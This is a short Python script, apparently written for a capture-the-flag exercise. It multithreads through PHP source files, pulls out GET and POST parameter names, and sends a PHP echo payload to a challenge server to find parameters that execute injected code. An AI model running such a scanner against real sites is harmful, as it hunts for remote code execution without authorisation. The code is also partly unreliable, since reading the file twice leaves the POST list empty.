import os
import requests
import re
import threading
import time
if __name__ == '__main__':
    print('start time  :  ' +time.asctime(time.localtime(time.time())))
    s1 = threading.Semaphore(100)
    filePath = r"F:\study\CTF\www\src"
    os.chdir(filePath)
    files = os.listdir(filePath)
    session = requests.Session()
    session.keep_alive = False
    def get_content(file):
        s1.acquire()
        print('trying  '+file+'   '+time.asctime(time.localtime(time.time())))
        with open(file,encoding='utf-8') as f:
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
        data = {}
        params = {}
        for m in gets:
            params[m] = "echo 'xxxx';"
        for n in posts:
            data[n]="echo 'xxxx';"
        url = 'http://452bce75-5a58-4196-b651-c98a96267fbd.node4.buuoj.cn/'+file
        req = session.post(url,data=data,params=params)
        req.close()
        req.encoding = 'utf-8'
        content = req.text
        if "xxxx" in content:  # 如果发现有可以利用的参数，继续筛选出具体的参数
            flag = 0
            for a in gets:
                req = session.get(url + '?%s=' % a + "echo 'xxxx';")
                content = req.text
                req.close()  # 关闭请求  释放内存
                if "xxxx" in content:
                    flag = 1
                    break
            if flag != 1:
                for b in posts:
                    req = session.post(url, data={b: "echo 'xxxx';"})
                    content = req.text
                    req.close()  # 关闭请求  释放内存
                    if "xxxx" in content:
                        break
            if flag == 1:  # flag用来判断参数是GET还是POST，如果是GET，flag==1，则b未定义；如果是POST，flag为0，
                param = a
            else:
                param = b
            print('找到了利用文件： ' + file + "  and 找到了利用的参数：%s" % param)
            print('结束时间：  ' + time.asctime(time.localtime(time.time())))
        s1.release()

    for i in files:
        t = threading.Thread(target=get_content, args=(i,))
        t.start()


